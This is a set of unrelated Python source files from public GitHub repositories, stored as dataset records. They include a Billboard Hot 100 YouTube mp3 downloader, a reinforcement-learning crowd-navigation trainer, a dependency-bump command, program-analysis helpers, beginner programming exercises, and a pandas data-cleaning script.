os.listdir(folder_name)\n\tif(len(listdirs) == 0):#Nothing to erase or worry about here.\n\t\treturn\n\n\tprint('\\n\\nWARNING! the files in', folder_name, 'will be DELETED!!!')\n\tprint('SAMPLE files inside include:')\n\tfor i in range( min( 7, len(listdirs) ) ):#Might not have enough(7) items to show, So....\n\t\tprint(listdirs[i])\n\tanswer = input('\\nAre you sure? (Y/N)')\n\tif(answer != 'y' and answer !='Y'):\n\t\tprint('Answer was not Yes, so not gonna delete them!')\n\t\treturn\n\n\tfor the_file in listdirs:\n\t\tfile_path = os.path.join(folder_name, the_file)\n\t\ttry:\n\t\t\tif os.path.isfile(file_path):\n\t\t\t\tos.unlink(file_path)\n\t\t\t#elif os.path.isdir(file_path): shutil.rmtree(file_path)\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\ndef download_mp3_files(link_list, wanted_filename, folder_name = Default_save_folder):\n\t\n\tif(len(link_list) != len(wanted_filename)):\n\t\tprint(\"ERROR : Links and Filenames list doesn't have Equal Length!\")\n\t\tprint('Links', len(link_list), ', Filenames', len(wanted_filename))\n\t\treturn\n\t\n\tif not os.path.exists(folder_name):#If this directory doesn't exist.\n\t\tos.makedirs(folder_name)\n\telse:#Already existed....\n\t\tdelete_files_in_folder_by_asking(folder_name)#Attempt to delete if existing files by asking permission!!\n\n\tfor i in range(len(link_list)):\n\t\tprint('-> Downloading',wanted_filename[i])#Some visual signal to alarm the user...\n\t\tTarget_file_dir = os.path.join(folder_name, wanted_filename[i] + '.mp3')\n\n\t\tif(os.path.exists(Target_file_dir)):#If it exists either in Folder / File... Don't mess with it.\n\t\t\tprint('File',Target_file_dir,'already exists, backing off...')\n\t\t\tcontinue\n\t\telse:\n\t\t\tresult = ydl.extract_info(link_list[i], download=True)#RICH of INFORMATION about that VIDEO tho!!!!!!\n\t\t\tos.rename(result['id'], Target_file_dir) # Move file.\n\n################################################################################\n\ndef Scrape_latest_Billboard_Top_100(max_count = 10, save_links_to_txt = False):\n\tprint('Scrape_latest_Billboard_Top_100 STARTING...')\n\n\tcounter = 0\n\tLinks = []\n\tFileNames = []\n\n\tYMDHMS_str = time.strftime(\"%Y-%m-%d_%H%M%S\", time.gmtime())#TIMESTAMP.\n\tSave_link_txt_dir = 'hot-100_' + YMDHMS_str + '.txt'#BASIC filename...\n\tlink_save_stream = open(Save_link_txt_dir, 'wt')\n\n\tchart = billboard.ChartData('hot-100')\n\tStart_time = time.time()\n\tfor song in chart:\n\t\tsearch_text = song.artist + ' - ' + song.title\n\t\tprint('Adding candidate :', search_text)#Friendly message\n\t\tlink_candidates = get_vid_links_by_Search(search_text)\n\t\tLinks.append(link_candidates[0])#Most likely to be the official release(most likely MV)\n\t\tFileNames.append(search_text)\n\n\t\tif(save_links_to_txt):\n\t\t\t#Format, argh. did %s first time. got %s,%s,%s... annoying.\n\t\t\tFormated_str = '{},{},{}\\n'.format(song.artist,song.title,link_candidates[0])\n\t\t\tlink_save_stream.write(Formated_str)\n\n\t\tcounter += 1\n\t\tif(counter % 5 == 0):#Show some stats.\n\t\t\tSec_per_candidate = (time.time() - Start_time) / counter\n\t\t\tprint('Counter:',counter,'/',max_count)\n\t\t\tprint('Sec per selecting Candidate:', Sec_per_candidate)\n\t\t\tprint('Remaining time:', (max_count - counter) * Sec_per_candidate, 'Seconds' )\n\n\t\tif(counter >= max_count):\n\t\t\tbreak#Out of for statement.\n\t\n\tif(save_links_to_txt):\n\t\tlink_save_stream.close()\n\t\n\tdownload_mp3_files(Links, FileNames, 'Hot_100')#DOWNLOAD!\n\n################################################################################\n\n#first = get_vid_links_by_Search('Rick Rolling')[0]\n#print(get_vid_links_by_Search('HAHAHA'))\n#download_mp3_files([first], ['BlahBlah'])\n\nScrape_latest_Billboard_Top_100(100, True)\n\ninput('Waiting...')\n\n################################################################################","repo_name":"junwoo091400/MyCODES","sub_path":"small_Projects(memory)/Billboard_hot100_downloader_by_youtube/Billboard_hot100_downloader.py","file_name":"Billboard_hot100_downloader.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17848915870","text":"from kv_database_be.log import logger\nfrom kv_database_be.constants import avail_benchmarks, avail_options\n\ndef get_avail_benchmarks():\n list_of_benchmarks = []\n for key in avail_benchmarks:\n benchmark = {\n \"label\": key,\n \"description\": avail_benchmarks[key]\n }\n list_of_benchmarks.append(benchmark)\n return list_of_benchmarks\n\ndef get_avail_options():\n return avail_options\n\ndef create_options_file(content):\n f=open(\"tmp_options.ini\",\"wb\")\n f.write(content)\n f.close()\n return True","repo_name":"HubDish/kv-database-api","sub_path":"kv_database_be/handlers/h_common.py","file_name":"h_common.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35962041716","text":"from typing import Tuple, Dict, Set, cast\n\nfrom discopop_explorer.PETGraphX import EdgeType, DepType, PETGraphX, NodeID, CUNode, MemoryRegion\nfrom discopop_explorer.pattern_detectors.combined_gpu_patterns.classes.Aliases import (\n VarName,\n)\n\n\ndef get_written_and_read_memory_regions_by_cu(\n contained_regions, pet: PETGraphX\n) -> Tuple[Dict[NodeID, Set[MemoryRegion]], Dict[NodeID, Set[MemoryRegion]]]:\n all_function_cu_ids: Set[NodeID] = set()\n for region in contained_regions:\n parent_function = pet.get_parent_function(pet.node_at(region.node_id))\n\n subtree = pet.subtree_of_type(parent_function, CUNode)\n all_function_cu_ids.update([NodeID(n.id) for n in subtree])\n\n written_memory_regions_by_cu_id: Dict[NodeID, Set[MemoryRegion]] = dict()\n read_memory_regions_by_cu_id: Dict[NodeID, Set[MemoryRegion]] = dict()\n for cu_id in all_function_cu_ids:\n in_dep_edges = pet.in_edges(cu_id, EdgeType.DATA)\n out_dep_edges = pet.out_edges(cu_id, EdgeType.DATA)\n\n written_memory_regions = [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in in_dep_edges\n if (d.dtype == DepType.RAW or d.dtype == DepType.WAW)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n written_memory_regions += [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in out_dep_edges\n if (d.dtype == DepType.WAR or d.dtype == DepType.WAW)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n\n read_memory_regions = [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in in_dep_edges\n if (d.dtype == DepType.WAR)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n read_memory_regions += [\n MemoryRegion(cast(str, d.memory_region))\n for s, t, d in out_dep_edges\n if (d.dtype == DepType.RAW)\n and d.memory_region is not None\n and len(d.memory_region) != 0\n ]\n\n if cu_id not in written_memory_regions_by_cu_id:\n written_memory_regions_by_cu_id[cu_id] = set()\n written_memory_regions_by_cu_id[cu_id] = set(written_memory_regions)\n\n if cu_id not in read_memory_regions_by_cu_id:\n read_memory_regions_by_cu_id[cu_id] = set()\n read_memory_regions_by_cu_id[cu_id] = set(read_memory_regions)\n return written_memory_regions_by_cu_id, read_memory_regions_by_cu_id\n\n\ndef get_cu_and_varname_to_memory_regions(\n contained_regions, pet: PETGraphX, written_memory_regions_by_cu: Dict[NodeID, Set[MemoryRegion]]\n) -> Dict[NodeID, Dict[VarName, Set[MemoryRegion]]]:\n # dict -> {Cu_ID: {var_name: [memory regions]}}\n result_dict: Dict[NodeID, Dict[VarName, Set[MemoryRegion]]] = dict()\n\n all_function_cu_ids: Set[NodeID] = set()\n for region in contained_regions:\n parent_function = pet.get_parent_function(pet.node_at(region.node_id))\n\n subtree = pet.subtree_of_type(parent_function, CUNode)\n all_function_cu_ids.update([NodeID(n.id) for n in subtree])\n\n for cu_id in all_function_cu_ids:\n if cu_id not in result_dict:\n result_dict[cu_id] = dict()\n\n # only out_deps considered, as in_deps might use variable names\n # which originate from different source code scopes\n out_dep_edges = pet.out_edges(cu_id, EdgeType.DATA)\n for _, _, dep in out_dep_edges:\n if dep.var_name is None or dep.memory_region is None or len(dep.memory_region) == 0:\n continue\n if dep.var_name not in result_dict[cu_id]:\n result_dict[cu_id][VarName(dep.var_name)] = set()\n result_dict[cu_id][VarName(dep.var_name)].add(dep.memory_region)\n\n return result_dict\n\n\ndef get_memory_region_to_cu_and_variables_dict(\n cu_and_variable_to_memory_regions: Dict[NodeID, Dict[VarName, Set[MemoryRegion]]]\n) -> Dict[MemoryRegion, Dict[NodeID, Set[VarName]]]:\n # inverts the given cu_and_variable_to_memory_regions dictionary\n result_dict: Dict[MemoryRegion, Dict[NodeID, Set[VarName]]] = dict()\n\n for cu_id in cu_and_variable_to_memory_regions:\n for var_name in cu_and_variable_to_memory_regions[cu_id]:\n for mem_reg in cu_and_variable_to_memory_regions[cu_id][var_name]:\n if mem_reg not in result_dict:\n result_dict[mem_reg] = dict()\n if cu_id not in result_dict[mem_reg]:\n result_dict[mem_reg][cu_id] = set()\n result_dict[mem_reg][cu_id].add(var_name)\n return result_dict\n","repo_name":"discopop-project/discopop","sub_path":"discopop_explorer/pattern_detectors/combined_gpu_patterns/step_1.py","file_name":"step_1.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"40490099704","text":"\n#sequence(runtut)\n#konversi celcius ke farenheit\n\nprint('==konversi celcius ke farenheit==')\n\nc=int(input('masukkan celcius'))\nf=9/5*c+32\nprint('suhu celcius=',c,'suhu farenheit=',f)\n\n\n#menghitung luas segitiga\n\nprint('==luas segitiga==')\n\na=int(input('alas='))\nt=int(input('tinggi='))\n\nl=1/2*a*t\nprint('alas=',a,'tinggi=',t,'luas=',l)\n\n#menghitung luas lingkaran\n\nprint('==luas lingkaran==')\n\nr=int(input('jari jari='))\nl=22/7*r**2\nprint('jari jari=',r,'luas=',l)\n\n#branching(selection)\n# syntax if ke-1 satu cabang\n#oddnumber\nprint('==oddnumber==')\nnum=int(input('masukkan angka='))\noddnum=None\nif num%2==1 :\n\toddnum=num\nprint(oddnum)\n\n\n#cari nilai max\n#tidak indentasi(tab)\n\nprint('==maxnumber==')\n\nnum1=int(input('masukkan angka-1='))\nnum2=int(input('masukkan angka-2='))\nif num1num2:\n\tmaxnum=num1\nprint(maxnum)\n\n#indentasi\nif num1num2:\n\tmaxnum=num1\n\tprint(maxnum)\n\n#syntax if ke-2 2 cabang\nif num130 and grade<=50:\n\tprint('C')\nif grade>50 and grade<=80:\n\tprint('B')\nif grade >80 and grade<=100:\n\tprint('A')\n\t\n#elif\ngrade=int(input('masukkan nilai='))\nif grade>0 and grade<=30:\n\tprint('D')\nelif grade>30 and grade<=50:\n\tprint('C')\nelif grade>50 and grade<=80:\n\tprint('B')\nelse:\n\tprint('A')\n\t\n#Looping(repetition) pengulangan\n\nprint('==LOOP==')\n\nfor i in range(3):\n\tprint(i)\nprint('end of iteration')\n\nfor i in range(6):\n\tprint(i+5)\nprint('end of iteration')\n\n#number=int(input('masukkan angka maks='))\nfor i in range(number):\n\tif i%2==1:\n\t\tprint('bilangan ganjil =',i)\nprint('==range==')\ntemp=0\nnumber=int(input('masukkan angka maks='))\nfor i in range(number):\n\tif i%2==1:\n\t\ttemp=temp+i\n\t\tprint('bilangan ganjil =',i)\nprint('jumlah angka ganjil =',temp)\n\n#2, 4, 6, 8, 10, .....\n#un=a+(n-1)b\nprint('==DERET==')\na=2\nb=2\nfor i in range(10):\n\tn=i+1\n\tun=a+(n-1)*b\n\tprint(un)\n\t\n#cara lain deret\nprint('==DERET==')\nfor i in range(2,21,2):\n\tprint(i)\n\t\n#cara lain\na=2\nfor i in range (10):\n\tprint(a)\n\ta=a+2\n\t\n#cara lain\na=2\ntemp=0\nfor i in range(10):\n\tprint(temp)\n\ttemp=temp+a\n\ta=a+2\nprint('jumlah=',temp)\n","repo_name":"dewialqurani/ALPRO_SEMESTER1","sub_path":"LATIHAN CCODING/maxnum,grade,loop.py","file_name":"maxnum,grade,loop.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40580741948","text":"#!/usr/bin/env python\n# coding: utf-8\n# This is my first notebook for learning python\n# refrence https://github.com/wesm/pydata-book\n# credit to Wes McKinney and Xu Liang\n\n# In[2]:\n\n\ns = 'python' #字符串可以是单引号或双引号\na = list(s)\nb = a[:3] \nc = s[:3] #注意b和c的类型差异,list和str\n\n\n# In[6]:\n\n\ns = '12\\\\34' # \\ 是转义字符\nprint(s) #print() 以及和直接s的区别\n\n\n# In[9]:\n\n\ns = r'this\\ is\\ a \\test' #前面加r代表每一个\\都是两个\\\\\ns\n\n\n# In[10]:\n\n\na = 'hello'\nb = 'world'\na + b #字符串合并\n\n\n# In[11]:\n\n\n#字符串格式化\ntemplate = '{0:.2f}{1:s} are worth US${2:d}'\n#{0:.2f} 表示第一个参数格式化为 2位浮点小数的浮点数\n#{1:s} 表示第二个参数格式化位字符串\n#{2:d} 表示第三个参数格式化为整数\ntemplate.format(4.5560,'Argentine Pesos',1)\n\n\n# In[16]:\n\n\n#日期和时间\n#内建datetime模块\nfrom datetime import datetime, date, time\ndt = datetime(2011, 10, 29, 20, 30 ,21)\ndt.day\ndt.date()\n\n\n# In[18]:\n\n\n#datetime转换为字符串,strftime\ndt.strftime('%m/%d/%Y %H:%M')\n\n\n# In[19]:\n\n\n#字符串转为datetime对象,strptime\ndatetime.strptime('20091031','%Y%m%d')\n\n\n# In[20]:\n\n\n#替换\ndt.replace(minute = 0,second = 0)\n#datetime是不可变类型,以上方法是产生新的对象\n\n","repo_name":"Cassie-Qiu68/Python-Learner","sub_path":"Python lesson One - basic .py","file_name":"Python lesson One - basic .py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11438960602","text":"from __future__ import absolute_import\nimport logging\n\nimport click\n\nfrom bumper import BumperDriver\n\nfrom workspace.commands import AbstractCommand\nfrom workspace.commands.helpers import expand_product_groups\nfrom workspace.config import config\nfrom workspace.scm import repo_check, current_branch\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Bump(AbstractCommand):\n \"\"\"\n Bump dependency versions in requirements.txt, pinned.txt, or any specified file.\n\n :param str names: Only bump dependencies that match the name.\n Name can be a product group name defined in workspace.cfg.\n To bump to a specific version instead of latest, append version to name\n (e.g. requests==1.2.3 or 'requests>=1.2.3'). When > or < is used, be sure to quote.\n :param int test: Run tests.\n :param bool push: Push the change. Use with --test to test before pushing.\n :param bool add: Add the `names` to the requirements file if they don't exist.\n :param str msg: Summary commit message\n :param str/list file: Requirement file to bump. Defaults to requirements.txt or pinned.txt\n that are set by bump.requirement_files in workspace.cfg.\n :param dict bumper_models: List of classes that implements :class:`bumper.cars.AbstractBumper`\n Defaults to :class:`bumper.cars.RequirementsBumper`\n :param bool force: Force a bump even when certain bump requirements are not met.\n :param bool dry_run: Perform a dry run by printing out the changes only without making changes.\n :param dict kwargs: Additional args from argparse\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n kwargs.setdefault('show_filter', True)\n super(Bump, self).__init__(*args, **kwargs)\n\n @classmethod\n def arguments(cls):\n _, docs = cls.docs()\n return ([\n cls.make_args('names', nargs='*', help=docs['names']),\n cls.make_args('--add', action='store_true', help=docs['add']),\n cls.make_args('--force', action='store_true', help=docs['force']),\n cls.make_args('-m', '--msg', help=docs['msg']),\n cls.make_args('--file', help=docs['file']),\n cls.make_args('-n', '--dry-run', action='store_true', help=docs['dry_run'])\n ], [\n cls.make_args('-t', '--test', action='count', help=docs['test']),\n cls.make_args('-p', '--push', action='store_true', help=docs['push']),\n ])\n\n def run(self):\n \"\"\"\n :return: Tuple with 3 elements: A map of file to bump message, commit message, and list of :class:`Bump`\n \"\"\"\n repo_check()\n\n self.commander.run('update')\n\n if not self.names:\n self.names = []\n\n filter_requirements = expand_product_groups(self.names)\n\n if self.show_filter and filter_requirements:\n click.echo('Only bumping: {}'.format(' '.join(filter_requirements)))\n\n if isinstance(self.file, list):\n requirement_files = self.file\n elif self.file:\n requirement_files = [self.file]\n else:\n requirement_files = config.bump.requirement_files.strip().split()\n\n bumper = BumperDriver(requirement_files, bumper_models=self.bumper_models, full_throttle=self.force, detail=True,\n test_drive=self.dry_run)\n messages, bumps = bumper.bump(filter_requirements, required=self.add, show_summary=False)\n commit_msg = None\n\n try:\n if messages:\n summary_msgs = []\n detail_msgs = []\n for m in sorted(messages.values()):\n splits = m.split('\\n', 1)\n summary_msgs.append(splits[0])\n if len(splits) == 2:\n detail_msgs.append(splits[1])\n\n commit_msg = '\\n\\n'.join(summary_msgs + detail_msgs)\n\n if self.msg:\n commit_msg = self.msg + '\\n\\n' + commit_msg\n else:\n config.commit.auto_branch_from_commit_words = 1\n\n if not self.dry_run:\n self.commander.run('commit', msg=commit_msg, files=list(messages.keys()))\n config.commit.auto_branch_from_commit_words = 2 # Restore it for unit tests\n\n except Exception:\n bumper.reverse()\n raise\n\n if bumps:\n if self.test:\n click.echo('Running tests')\n self.commander.run('test', return_output=False, test_dependents=self.test > 1)\n\n if not self.dry_run:\n if self.push:\n branch = current_branch()\n self.commander.run('push', branch=branch)\n\n return messages, commit_msg, bumps\n","repo_name":"maxzheng/workspace-tools","sub_path":"workspace/commands/bump.py","file_name":"bump.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34070743066","text":"import sys\nimport logging\nimport argparse\nimport configparser\nimport os\nimport shutil\nimport torch\nimport gym\nimport git\nfrom crowd_sim.envs.utils.robot import Robot\nfrom crowd_nav.utils.trainer import Trainer\nfrom crowd_nav.utils.memory import ReplayMemory\nfrom crowd_nav.utils.explorer import Explorer\nfrom crowd_nav.policy.policy_factory import policy_factory\n\n\ndef main():\n parser = argparse.ArgumentParser('Parse configuration file')\n parser.add_argument('--env_config', type=str, default='configs/env.config')\n parser.add_argument('--policy', type=str, default='cadrl')\n parser.add_argument('--policy_config', type=str, default='configs/policy.config')\n parser.add_argument('--train_config', type=str, default='configs/train.config')\n parser.add_argument('--output_dir', type=str, default='data/output')\n parser.add_argument('--weights', type=str)\n parser.add_argument('--resume', default=False, action='store_true')\n parser.add_argument('--gpu', default=False, action='store_true')\n parser.add_argument('--debug', default=False, action='store_true')\n args = parser.parse_args()\n\n # configure paths\n make_new_dir = True\n if os.path.exists(args.output_dir):\n key = input('Output directory already exists! Overwrite the folder? (y/n)')\n if key == 'y' and not args.resume:\n shutil.rmtree(args.output_dir)\n else:\n make_new_dir = False\n args.env_config = os.path.join(args.output_dir, os.path.basename(args.env_config))\n args.policy_config = os.path.join(args.output_dir, os.path.basename(args.policy_config))\n args.train_config = os.path.join(args.output_dir, os.path.basename(args.train_config))\n if make_new_dir:\n os.makedirs(args.output_dir)\n shutil.copy(args.env_config, args.output_dir)\n shutil.copy(args.policy_config, args.output_dir)\n shutil.copy(args.train_config, args.output_dir)\n log_file = os.path.join(args.output_dir, 'output.log')\n il_weight_file = os.path.join(args.output_dir, 'il_model.pth')\n rl_weight_file = os.path.join(args.output_dir, 'rl_model.pth')\n\n # configure logging\n mode = 'a' if args.resume else 'w'\n file_handler = logging.FileHandler(log_file, mode=mode)\n stdout_handler = logging.StreamHandler(sys.stdout)\n level = logging.INFO if not args.debug else logging.DEBUG\n logging.basicConfig(level=level, handlers=[stdout_handler, file_handler],\n format='%(asctime)s, %(levelname)s: %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\")\n repo = git.Repo(search_parent_directories=True)\n logging.info('Current git head hash code: %s'.format(repo.head.object.hexsha))\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() and args.gpu else \"cpu\")\n logging.info('Using device: %s', device)\n\n # configure policy\n policy = policy_factory[args.policy]()\n if not policy.trainable:\n parser.error('Policy has to be trainable')\n if args.policy_config is None:\n parser.error('Policy config has to be specified for a trainable network')\n policy_config = configparser.RawConfigParser()\n policy_config.read(args.policy_config)\n policy.configure(policy_config)\n policy.set_device(device)\n\n # configure environment\n env_config = configparser.RawConfigParser()\n env_config.read(args.env_config)\n env = gym.make('CrowdSim-v0')\n env.configure(env_config)\n robot = Robot(env_config, 'robot')\n env.set_robot(robot)\n\n # read training parameters\n if args.train_config is None:\n parser.error('Train config has to be specified for a trainable network')\n train_config = configparser.RawConfigParser()\n train_config.read(args.train_config)\n rl_learning_rate = train_config.getfloat('train', 'rl_learning_rate')\n train_batches = train_config.getint('train', 'train_batches')\n train_episodes = train_config.getint('train', 'train_episodes')\n sample_episodes = train_config.getint('train', 'sample_episodes')\n target_update_interval = train_config.getint('train', 'target_update_interval')\n evaluation_interval = train_config.getint('train', 'evaluation_interval')\n capacity = train_config.getint('train', 'capacity')\n epsilon_start = train_config.getfloat('train', 'epsilon_start')\n epsilon_end = train_config.getfloat('train', 'epsilon_end')\n epsilon_decay = train_config.getfloat('train', 'epsilon_decay')\n checkpoint_interval = train_config.getint('train', 'checkpoint_interval')\n\n # configure trainer and explorer\n memory = ReplayMemory(capacity)\n model = policy.get_model()\n batch_size = train_config.getint('trainer', 'batch_size')\n trainer = Trainer(model, memory, device, batch_size)\n explorer = Explorer(env, robot, device, memory, policy.gamma, target_policy=policy)\n\n # imitation learning\n if args.resume:\n if not os.path.exists(rl_weight_file):\n logging.error('RL weights does not exist')\n model.load_state_dict(torch.load(rl_weight_file))\n rl_weight_file = os.path.join(args.output_dir, 'resumed_rl_model.pth')\n logging.info('Load reinforcement learning trained weights. Resume training')\n elif os.path.exists(il_weight_file):\n model.load_state_dict(torch.load(il_weight_file))\n logging.info('Load imitation learning trained weights.')\n else:\n il_episodes = train_config.getint('imitation_learning', 'il_episodes')\n il_policy = train_config.get('imitation_learning', 'il_policy')\n il_epochs = train_config.getint('imitation_learning', 'il_epochs')\n il_learning_rate = train_config.getfloat('imitation_learning', 'il_learning_rate')\n trainer.set_learning_rate(il_learning_rate)\n if robot.visible:\n safety_space = 0\n else:\n safety_space = train_config.getfloat('imitation_learning', 'safety_space')\n il_policy = policy_factory[il_policy]()\n il_policy.multiagent_training = policy.multiagent_training\n il_policy.safety_space = safety_space\n robot.set_policy(il_policy)\n explorer.run_k_episodes(il_episodes, 'train', update_memory=True, imitation_learning=True)\n trainer.optimize_epoch(il_epochs)\n torch.save(model.state_dict(), il_weight_file)\n logging.info('Finish imitation learning. Weights saved.')\n logging.info('Experience set size: %d/%d', len(memory), memory.capacity)\n explorer.update_target_model(model)\n\n # reinforcement learning\n policy.set_env(env)\n robot.set_policy(policy)\n robot.print_info()\n trainer.set_learning_rate(rl_learning_rate)\n # fill the memory pool with some RL experience\n if args.resume:\n robot.policy.set_epsilon(epsilon_end)\n explorer.run_k_episodes(100, 'train', update_memory=True, episode=0)\n logging.info('Experience set size: %d/%d', len(memory), memory.capacity)\n episode = 0\n while episode < train_episodes:\n if args.resume:\n epsilon = epsilon_end\n else:\n if episode < epsilon_decay:\n epsilon = epsilon_start + (epsilon_end - epsilon_start) / epsilon_decay * episode\n else:\n epsilon = epsilon_end\n robot.policy.set_epsilon(epsilon)\n\n # evaluate the model\n if episode % evaluation_interval == 0:\n explorer.run_k_episodes(env.case_size['val'], 'val', episode=episode)\n\n # sample k episodes into memory and optimize over the generated memory\n explorer.run_k_episodes(sample_episodes, 'train', update_memory=True, episode=episode)\n trainer.optimize_batch(train_batches)\n episode += 1\n\n if episode % target_update_interval == 0:\n explorer.update_target_model(model)\n\n if episode != 0 and episode % checkpoint_interval == 0:\n torch.save(model.state_dict(), rl_weight_file)\n\n # final test\n explorer.run_k_episodes(env.case_size['test'], 'test', episode=episode)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vita-epfl/CrowdNav","sub_path":"crowd_nav/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":500,"dataset":"github-code","pt":"72"} +{"seq_id":"1616691818","text":"def permute(a, l, r):\n if l == r:\n return ''.join(a)\n else:\n permutations = []\n for i in range(l,r+1):\n a[l], a[i] = a[i], a[l]\n p = permute(a, l+1, r)\n for j in p:\n permutations.append(j)\n a[l], a[i] = a[i], a[l]\n return permutations\n16/21\ndef programmerStrings(s):\n t = 'programmer'\n first_end = 0\n last_begin = len(s) - 1\n for i in range(0,len(s)):\n prefix = s[0:i+1]\n permutations = permute(list(prefix), 0, i)\n for p in permutations:\n if t in p:\n first_end = i\n break\n if first_end != 0:\n break\n for i in range(len(s)-1,-1,-1):\n suffix = s[i : len(s)]\n permutations = permute(list(suffix), 0, i)\n for p in permutations:\n if t in p:\n last_begin = i\n break\n if last_begin != 0:\n break\n return last_begin - first_end - 1","repo_name":"minjeoong/baekjoon_","sub_path":"test4_result2.py","file_name":"test4_result2.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72497802152","text":"__author__ = 'jean'\n\ndef secant(base, exp=2, it=20):\n def f(x):\n return x**exp - base\n x1 = base /(exp**2)\n xnm1 = x1 - 5\n xnm2 = x1 + 5\n xn = 0\n for n in range(it):\n q = (xnm1-xnm2)/(f(xnm1)-f(xnm2))\n xn = xnm1 - (f(xnm1)*q)\n xnm1, xnm2 = xn, xnm1\n return xn\n\nprint(secant(2, 2))\n","repo_name":"nsabimana/Python-Jean-Paul-Nsabimana","sub_path":"forwhile.py","file_name":"forwhile.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11156397710","text":"#This program calculates the body mass of a person.\n#It asks for height in meters and provides weight in kg\n\nprint(\"This program calculates your Body Mass Index (BMI) and its classification\")\n\nweight = float ( input(\"Type your Weight in Kg (example 80): \") )\nheight = float ( input(\"Type your Height in Meters (example 1.80): \") )\n\nbmi = weight / (height ** 2)\nprint(\"Your BMI is: \", round(bmi, 2))\n\nif (bmi <= 18.5):\n classification = \"Underweight\"\nelif (bmi > 18.5 and bmi <= 24.9):\n classification = \"Normal Weight\"\nelif (bmi > 24.9 and bmi <= 29.9):\n classification = \"Overweight\"\nelse:\n classification = \"Obese\"\nprint(\"The classification of your BMI is: \", classification)","repo_name":"mdbstrategies/pythonProject","sub_path":"17_ConditionalsExercise.py","file_name":"17_ConditionalsExercise.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11489395407","text":"import pandas as pd\nfrom datetime import datetime\nfrom cl_cleaning import CleaningText as ct \nfrom ica_raw import InternalControlAnalysis \n\n# Configuraciones \npd.set_option('float_format', '{:,.2f}'.format) # Configura pandas para mostrar solo dos decimales \n\n# Importar bases de datos \nbd = pd.read_csv('input/base2345.csv', sep=';', dtype='object')\nf4 = pd.read_csv('input/210513-015942-f4-output.csv', sep=';', dtype='object')\nf3 = pd.read_csv('input/210513-204312-f3v1-output.csv', sep=';', dtype='object')\nkpi = pd.read_csv('input/210528-153310-kpi.csv', sep=';', dtype='object')\n\n# Variables\ndt_string = datetime.now().strftime('%y%m%d-%H%M')\nindex_name = 'indice_b25'\ncost_column = 'total'\n\n# Normalizar nombres de columnas\nbd = ct.normalizar_cols(bd)\nf4 = ct.normalizar_cols(f4)\nf3 = ct.normalizar_cols(f3)\nkpi = ct.normalizar_cols(kpi)\n\n# Convertir columnas de precio a dato numérico\nbd = ct.convertir_a_numero(bd, ['precio_costo', 'total'])\n\n# Generar indice en columna\nbd.reset_index(inplace=True)\nbd.rename(columns={'index': index_name}, inplace=True)\n\n# Obtener el año de la reserva, el envío y la recepción\ncolsf4 = ['fecha creacion', 'fecha reserva', 'fecha envio']\nnewcolsf4 = ['aaaa creacion', 'aaaa reserva', 'aaaa envio']\nf4[newcolsf4] = f4[colsf4].apply(lambda x: x.str.extract('(\\d{4})', expand=False))\n\ncolsf3 = ['fecha reserva', 'fecha envio', 'fecha anulacion','fecha confirmacion']\nnewcolsf3 = ['aaaa reserva', 'aaaa envio', 'aaaa anulacion','aaaa confirmacion']\nf3[newcolsf3] = f3[colsf3].apply(lambda x: x.str.extract('(\\d{4})', expand=False))\n\nkpi['aaaa paletiza'] = kpi['fecha_paletiza'].str.extract('(\\d{4})')\n\n# Extrae los valores númericos del campo entrada del kpi \nkpi['entrada'] = kpi.entrada.str.extract('(\\d+)', expand=False)\n\n# Análisis de F3\nbd.loc[bd['estatus final']=='Recibido en CD', 'nef'] = 'Recibido en CD'\nbd.loc[(bd['estatus final']=='Dado de baja por entregado a cliente -(Autoriza Gerencia de Control Operacional)') \n | (bd['estatus final']=='Dado de baja por F12 entregado en tienda antes de inventario (Autoriza Gerencia de Control Operacional) ') \n | (bd['estatus final']=='Dado de baja por error en la generación de la NC - Autoriza Gerencia de Control Operacional) ') \n | (bd['estatus final']=='Cierre x F4 Cobrado a terceros'), 'nef'] = 'F4s'\nbd.loc[bd['estatus final'] == 'Con F3 Proveedor ','nef'] = 'Con F3 Proveedor'\n\nica = InternalControlAnalysis(bd,index_name, cost_column)\n\ndff3p = bd[(bd['estatus final'] == 'Con F3 Proveedor ') & (bd['tpificacion'] == 'CERRADO ')]\n\nnf3p = dff3p.shape[0]\ncf3p = dff3p[cost_column].sum()\n\ndff3p2, nfnan, cfnan = ica.get_fnan( dff3p, 'f3', 'F3')\ndff3p3, ndu, cdu = ica.get_duplicates( dff3p2, ['f3', 'upc'], 'F3')\nne, nne, cne = ica.get_notfound( dff3p3, f3, ['f3', 'upc'], ['nro devolucion', 'upc'], 'nro devolucion', 'F3')\nbdf3cant 